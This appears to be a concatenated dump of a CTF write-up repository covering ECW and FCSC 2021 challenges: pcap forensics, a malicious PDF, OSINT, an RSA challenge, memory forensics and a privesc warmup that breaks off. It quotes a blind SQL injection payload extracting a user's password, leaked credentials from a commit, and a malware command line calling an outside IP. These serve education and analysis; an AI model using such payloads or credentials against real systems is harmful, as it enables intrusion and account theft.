/2021/ECW/forensics/Logs/Microsoft-Windows-WER-PayloadHealth%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-WER-PayloadHealth%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-WMI-Activity%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-WMI-Activity%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-WPD-ClassInstaller%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-WPD-ClassInstaller%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Wcmsvc%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Wcmsvc%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-WebAuthN%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-WebAuthN%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-WinRM%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-WinRM%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Windows Defender%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Windows Defender%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Windows Defender%4WHC.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Windows Defender%4WHC.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Windows Firewall With Advanced Security%4FirewallDiagnostics.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Windows Firewall With Advanced Security%4FirewallDiagnostics.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-WindowsBackup%4ActionCenter.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-WindowsBackup%4ActionCenter.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-WindowsUpdateClient%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-WindowsUpdateClient%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Winlogon%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Winlogon%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-WorkFolders%4WHC.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-WorkFolders%4WHC.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/OAlerts.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/OAlerts.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Parameters.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Parameters.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Security.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Security.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Setup.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Setup.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/State.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/State.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/System.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/System.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Windows PowerShell.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Windows PowerShell.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/microsoft-windows-diagnosis-scripted%4operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/microsoft-windows-diagnosis-scripted%4operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/NightlyPlanet.md: -------------------------------------------------------------------------------- 1 | # Nightly Planet 2 | 3 | ## Part 1/2 4 | 5 | ``` 6 | The Nightly Planet is a famous Gotham NewsPaper. Its redaction team has noticed suspicious activity on their computers, and require your help to find out what happened, and lead the investigation! 7 | 8 | They have provided you with a network capture taken on their main server. Can you discover all the steps of the attack? 9 | ``` 10 | 11 | File: [ECW_chall_JBV.pcapng](ECW_chall_JBV.pcapng) 12 | 13 | 14 | 15 | For this challenge, we got a 13 MB pcapng file we can open with WIreshark. It's really long. My first reflex is to apply the filter `dns` to look for a strange domain name in the requests. I notice 2 domains : `wpad.home` and `evil.com`. The second one is a joke but if we scroll down from the `wpad.home` request without any filter we can see an HTTP request to `http://192.168.1.54/MonSuperCMS/Internal/login.php `. With the filter `ip.addr == 192.168.1.54` we can see interesting stuff ! 16 | 17 | There are a lot of requests like `GET /MonSuperCMS/Public/articles.php?id=1'%20AND%20(ASCII(SUBSTR((SELECT%20password%20FROM%20users%20LIMIT%200,1),3,1)))%20=%2038%20AND%20'1'='1`. It is SQL injection. For this example the server will respond the first article if the 3rd character of the user's password is a `&` (char 38 in the ASCII table). We export these requests (filter `ip.addr == 192.168.1.54 && http`) to a file called [lite.pcapng](lite.pcapng) and we can write an ugly Python code to extract the password : 18 | 19 | ```python 20 | from scapy.all import * 21 | 22 | packets = rdpcap('lite.pcapng') 23 | 24 | for packet in packets: 25 | req = packet[Raw].load.decode().split(" ")[1].split("/")[-1] 26 | if req.startswith("articles.php"): 27 | c = int(req.split("%20")[9]) 28 | if "Scribes" in packet[Raw].load.decode(): 29 | print(chr(c), end="") 30 | ``` 31 | 32 | And the flag is `ECW1{AlwaysThatBooleanBasedSQLi` (the chall maker said that's normal if it is truncated). 33 | 34 | 35 | 36 | ## Part 2/2 37 | 38 | The capture is the same file and we don't have further information but it is easy to see a `POST /MonSuperCMS/Intranet/upload.php` to the same server just after the SQL injection. With Wireshark we can export the [uploaded PDF document](CONFIDENTIAL.pdf). Its name is `CONFIDENTIAL.pdf` but when we open it, it is pretty disappointing. 39 | 40 | When we open the PDF with a text editor, we can see this line : `/JS <6170702E616C65727428224F6F70732021204E6F7468696E6720746F20736565206865726522293B0A2F2F57656C6C20446F6E652021204465636F64652074686520666F6C6C6F77696E6720737472696E672066726F6D2062617365363420746F206765742074686520326E6420666C61670A2F2F2052554E584D6E744E5957787059326C7664584E5152455A42636D565464476C736245465561476C755A7A39390A>` but I don't know what it means... It's obvious that it is hexadecimal. Let's open a shell to convert that : 41 | 42 | ``` 43 | $ echo "6170702E616C65727428224F6F70732021204E6F7468696E6720746F20736565206865726522293B0A2F2F57656C6C20446F6E652021204465636F64652074686520666F6C6C6F77696E6720737472696E672066726F6D2062617365363420746F206765742074686520326E6420666C61670A2F2F2052554E584D6E744E5957787059326C7664584E5152455A42636D565464476C736245465561476C755A7A39390A" | xxd -r -ps 44 | app.alert("Oops ! Nothing to see here"); 45 | //Well Done ! Decode the following string from base64 to get the 2nd flag 46 | // RUNXMntNYWxpY2lvdXNQREZBcmVTdGlsbEFUaGluZz99 47 | 48 | $ echo "RUNXMntNYWxpY2lvdXNQREZBcmVTdGlsbEFUaGluZz99" | base64 -d 49 | ECW2{MaliciousPDFAreStillAThing?} 50 | ``` 51 | 52 | 53 | 54 | -------------------------------------------------------------------------------- /2021/ECW/forensics/lite.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/lite.pcapng -------------------------------------------------------------------------------- /2021/ECW/forensics/rt1/Readme.txt: -------------------------------------------------------------------------------- 1 | Step1: 2 | Is there any suspicious activity ? 3 | 4 | 5 | Rules: 6 | To unlock the step2, find the malicious url 7 | The format to use is the following: 8 | sha256(XXX::/domain:port/page1) 9 | 10 | The sha256 hash must be in lowercase. -------------------------------------------------------------------------------- /2021/ECW/forensics/solve.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | packets = rdpcap('lite.pcapng') 4 | 5 | for packet in packets: 6 | req = packet[Raw].load.decode().split(" ")[1].split("/")[-1] 7 | if req.startswith("articles.php"): 8 | c = int(req.split("%20")[9]) 9 | if "Scribes" in packet[Raw].load.decode(): 10 | print(chr(c), end="") 11 | -------------------------------------------------------------------------------- /2021/ECW/pentest/RedTeam.md: -------------------------------------------------------------------------------- 1 | # Read Team 2 | 3 | ## part 1/4 4 | 5 | ``` 6 | The CSO of a famous company is looking for skilled hackers to join his team. 7 | 8 | He sent the following challenge: 9 | 10 | I setup a website to challenge your skill as a pentester 11 | Find me over the Internet as I stand by the nickname Zer0DayH4ckz0r 12 | If you reach my website you should be able to gain control of a server 13 | You will then need to go deeper and find a pivot 14 | Finally if your are good enough you will send me my own password as a NTLM hash 15 | Good luck! 16 | ``` 17 | 18 | This first part is an OSINT challenge. We google the nickname `Zer0DayH4ckz0r` and we find [his Twitter](https://twitter.com/Zer0DayH4ckz0r/). If we scroll down we find [his GitHub](https://github.com/Zer0DayH4ckz0r). (We could have used [this tool](https://whatsmyname.app/) to find these accounts.) 19 | 20 | We open his first repository, open the commit history and [the penultimate commit](https://github.com/Zer0DayH4ckz0r/instagram-terminal-news-feed/commit/f68fd2cdea9ad63b9817543d436913f22ec10180) looks interesting (`Oops, removed credentials from repo`): 21 | 22 | ```diff 23 | - {'username': 'Zer0DayJLD', 'password': 'MyS3cureP4ssw0rdInstagr4m'} 24 | ``` 25 | 26 | Let's visit [https://www.instagram.com/Zer0DayJLD/](https://www.instagram.com/Zer0DayJLD/). On the 5th post we can see the screen of a computer on the photo with a company name: PharmaHealthyCat. If we google this name, we find a the LinkedIn page of [Eric Van Taten, Doctor at PharmaHealthyCat](https://fr.linkedin.com/in/eric-van-taten-68480120a). We find he follows the topic *PharmaHealtyCat* on on this page we found the link of the company website: [https://phealthycat.org/](https://phealthycat.org/). -------------------------------------------------------------------------------- /2021/ECW/pentest/redteam/notes.txt: -------------------------------------------------------------------------------- 1 | https://twitter.com/Zer0DayH4ckz0r/ 2 | https://github.com/Zer0DayH4ckz0r 3 | https://whatsmyname.app/ 4 | https://github.com/Zer0DayH4ckz0r/instapy-cli/commit/2fedfa6036982133d6c62d6472f323342037243c 5 | https://www.instagram.com/zer0dayjld/ 6 | https://www.instagram.com/p/CP-sM7ONF_b/ 7 | https://www.linkedin.com/company/pharmahealthycat/about/ 8 | https://phealthycat.org/home/index 9 | -------------------------------------------------------------------------------- /2021/FCSC/README.md: -------------------------------------------------------------------------------- 1 | # France Cybersecurity Challenge 2021 2 | 3 | Le FCSC est organisé tous les ans par l'ANSSI pour sélectionner les membres qui composeront l'équipe de France lors l'European Cybersecurity Challenge (ECSC). 4 | 5 | ### intro 6 | Je n'ai pas écrit de writeup pour pour les challenges d'introduction mais si vous êtes débutants, je vous invite à aller voir [ceux de Podalirius](https://podalirius.net/writeups/fcsc2021-writeup-introduction/), ils sont vraiment top ! 7 | 8 | ### hardware 9 | * [B.A. BA - 30 pts](./hardware/BABA/README.md) 10 | * [Phase à phase - 50 pts](./hardware/phase-a-phase/README.md) 11 | 12 | ### misc 13 | 14 | - [Privesc Me (1) - Warmup - 25 pts](./misc/privesec_me1/README.md) 15 | - [My Whois - 25 pts](./misc/whois/README.md) 16 | - [Ventriglisse - 148 pts](./misc/ventriglisse/README.md) 17 | 18 | ### crypto 19 | 20 | - [RSA Destroyer - 182 pts](./crypto/rsa-destroyer/README.md) 21 | 22 | ### forensic 23 | 24 | - [Malware 1/3 - 100 pts](./forensic/malware1/README.md) 25 | 26 | ### reverse 27 | 28 | - [Jakarta - 25 pts](./reverse/jakarta/README.md) 29 | 30 | 31 | 32 | Un grand merci à toute l'équipe du FCSC pour ces challenges de qualité, variés et très originaux !! 33 | -------------------------------------------------------------------------------- /2021/FCSC/crypto/rsa-destroyer/output.txt: -------------------------------------------------------------------------------- 1 | e = 65537 2 | n = 444874973852804286630293120525019547982392964519934608680681255396764239795499482860997657663742247333836933457910503642061679607999128792657151145831533603267962151902191791568052924623477918783346790554917615006885807262798511378178431356140169891510484103567017335784087168191133679976921108092647227149255338118895695993606854195408940572577899625236666854544581041490770396755583819878794842828965377818593455075306655077757834318066860484956428681524881285058664687568640627516452658874124048546780999256640377399347893644988620246748059490751348919880389771785423781356133657866769589669296191804649195706447605778549172906037483 3 | c = 95237912740655706597869523108017194269174342313145809624317482236690453533195825723998662803480781411928531102859302761153780930600026069381338457909962825300269319811329312349030179047249481841770850760719178786027583177746485281874469568361239865139247368477628439074063199551773499058148848583822114902905937101832069433266700866684389484684637264625534353716652481372979896491011990121581654120224008271898183948045975282945190669287662303053695007661315593832681112603350797162485915921143973984584370685793424167878687293688079969123983391456553965822470300435648090790538426859154898556069348437896975230111242040448169800372469 4 | -------------------------------------------------------------------------------- /2021/FCSC/crypto/rsa-destroyer/rsa_destroyer.py: -------------------------------------------------------------------------------- 1 | # **This** destroyes the RSA cryptosystem. 2 | 3 | from Crypto.Util.number import isPrime, bytes_to_long 4 | from Crypto.Random.random import getrandbits 5 | 6 | def fastPrime(bits, eps = 32): 7 | while True: 8 | a, e, u = getrandbits(eps), getrandbits(eps), getrandbits(4 * eps) 9 | p = a * (2 ** bits - e) + u 10 | if isPrime(p): 11 | return p 12 | 13 | def generate(bits = 2048): 14 | p = fastPrime(bits // 2) 15 | q = fastPrime(bits // 2) 16 | return p * q, 2 ** 16 + 1 17 | 18 | n, e = generate() 19 | 20 | p = bytes_to_long(open("flag.txt", "rb").read()) 21 | c = pow(p, e, n) 22 | 23 | print(f"e = {e}") 24 | print(f"n = {n}") 25 | print(f"c = {c}") 26 | -------------------------------------------------------------------------------- /2021/FCSC/forensic/malware1/README.md: -------------------------------------------------------------------------------- 1 | # Malware 1/3 - 100 pts 2 | 3 | aka Démonstration de la puissance de `grep` :slightly_smiling_face: 4 | 5 | > *Ce challenge est un challenge en 3 parties indépendantes, mais dont l'ordre logique est indiqué par les numéros : forensics (1) -> pwn (2) -> reverse (3).* 6 | > 7 | > **/!\ L'image mémoire ci-jointe contient un programme qui a la capacité de chiffrer le fichier** `/home/%USER%/Desktop/flag.txt` **/!\\** 8 | > 9 | > Oh non ! Votre précieux fichier `flag.txt` présent sur votre bureau semble avoir été chiffré par un programme malveillant... Votre premier réflexe a été d'effectuer une capture mémoire, peut être que le malware tourne encore... 10 | > 11 | > Le flag est au format `FCSC{sha256(username:hostname:cmdline)}`, où `username` est le nom de l'utilisateur ayant exécuté le malware, `hostname` est le nom de la machine sur laquelle celui-ci a été exécuté et `cmdline` est la ligne de commande complète qui a été exécutée afin de lancer le programme malveillant. 12 | > 13 | > `snapshot.sav.7z` (149MB) : https://files.france-cybersecurity-challenge.fr/dl/malware/snapshot.sav.7z 14 | > 15 | > SHA256(`snapshot.sav`) = `7eab73f5526ea0ac19edddc350155410ff4c77a15ac93f1c908b81884ef016a8`. 16 | 17 | Après avoir passé trop de temps à essayer de monter une VM avec le même kernel, je me suis dit que j'allais y aller à grand coup de `strings` et `grep`. 18 | 19 | Pour le nom d'utilisateur : 20 | 21 | ``` 22 | $ strings snapshot.sav | grep /home/ 23 | /home/forensics/.cache 24 | /home/forensics/.cache/tracker 25 | /home/forensics/.local/share/icons/Yaru 26 | /home/forensics/.icons/Yaru 27 | /home/forensics/.local/share/icons 28 | file:///home/forensics/Vid%C3%A9os 29 | [...] 30 | ``` 31 | 32 | C'est sans doute `forensics`. 33 | 34 | 35 | 36 | Pour l'hostname : 37 | 38 | ``` 39 | $ strings snapshot.sav | grep forensics@ 40 | [...] 41 | 0;forensics@fcsc2021: ~/Bureau 42 | [01;32mforensics@fcsc2021 43 | forensics@fcsc2021: ~/Bureau 44 | forensics@fcsc2021:~/Bureau$ /bin/1 --client -i 192.168.56.103 45 | forensics@fcsc2021: ~/Bureau 46 | forensics@fcsc2021: ~/Bureau 47 | [...] 48 | 49 | ``` 50 | 51 | C'est `fcsc2021` et on a même trouvé la commande malveillante : `/bin/1 --client -i 192.168.56.103`. 52 | 53 | 54 | 55 | ``` 56 | $ echo -n "forensics:fcsc2021:/bin/1 --client -i 192.168.56.103" | sha256sum 57 | 34aa0f2895fc61bdfb26c47708d78c6b99db30dddaecaa93cf5a4ab5acb76923 - 58 | ``` 59 | 60 | (on oublie pas le `-n` sinon `echo` fait un saut de ligne et le sha256 est différent) 61 | 62 | ``` 63 | FCSC{34aa0f2895fc61bdfb26c47708d78c6b99db30dddaecaa93cf5a4ab5acb76923} 64 | ``` -------------------------------------------------------------------------------- /2021/FCSC/hardware/BABA/Figure_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/FCSC/hardware/BABA/Figure_1.png -------------------------------------------------------------------------------- /2021/FCSC/hardware/BABA/Figure_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/FCSC/hardware/BABA/Figure_2.png -------------------------------------------------------------------------------- /2021/FCSC/hardware/phase-a-phase/Figure_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/FCSC/hardware/phase-a-phase/Figure_1.png -------------------------------------------------------------------------------- /2021/FCSC/hardware/phase-a-phase/bpsk.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/FCSC/hardware/phase-a-phase/bpsk.gif -------------------------------------------------------------------------------- /2021/FCSC/hardware/phase-a-phase/challenge.iq: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/FCSC/hardware/phase-a-phase/challenge.iq -------------------------------------------------------------------------------- /2021/FCSC/misc/privesec_me1/README.md: -------------------------------------------------------------------------------- 1 | # Privesc Me (1) - Warmup - 25 pts 2 | 3 | > Un challenge d'échauffement vous attend dans le dossier `stage0`. À vous de trouver un moyen d'augmenter vos privilèges. 4 | > 5 | > `ssh -p7005 challenger@challenges1.france-cybersecurity-challenge.fr` (mot de passe : `challenger`.) 6 | > 7 | > *Note : cet environnement est partagé entre les 4 challenges `Privesc Me`. Le dossier /tmp est nettoyé fréquemment.* 8 | 9 | On se connecte en SSH comme demandé et un gros message en rouge nous accueille : 10 | 11 | ``` 12 | ***************************************************************************************************** 13 | ***************************************************************************************************** 14 | You can create yourself a random directory inside /tmp directory to start creating scripts if needed. 15 | ***************************************************************************************************** 16 | ***************************************************************************************************** 17 | 18 | challenger@privescme:~$ 19 | ``` 20 | 21 | ``` 22 | challenger@privescme:~$ ls 23 | stage0 stage1 stage2 stage3 24 | challenger@privescme:~$ cd stage0 25 | challenger@privescme:~/stage0$ ls -l 26 | total 28 27 | -r--r----- 1 root stage0_privileged 70 Apr 25 20:12 flag.txt 28 | -r-xr-sr-x 1 root stage0_privileged 16792 Apr 25 20:14 stage0 29 | -r--r--r-- 1 root stage0_privileged 223 Apr 25 20:12 stage0.c 30 | ``` 31 | 32 | Le binaire `stage0` a un bit *setgid* ce qui signifie que nous l'exécutons comme si nous étions le groupe propriétaire c'est-à-dire `stage0_privileged`, ça tombe bien car contrairement à nous, il a le droit le lire `flag.txt` ! 33 | 34 | On suppose que `stage0.c` est le code source du binaire : 35 | 36 | ```c 37 | challenger@privescme:~/stage0$ cat stage0.c 38 | #define _GNU_SOURCE 39 | #include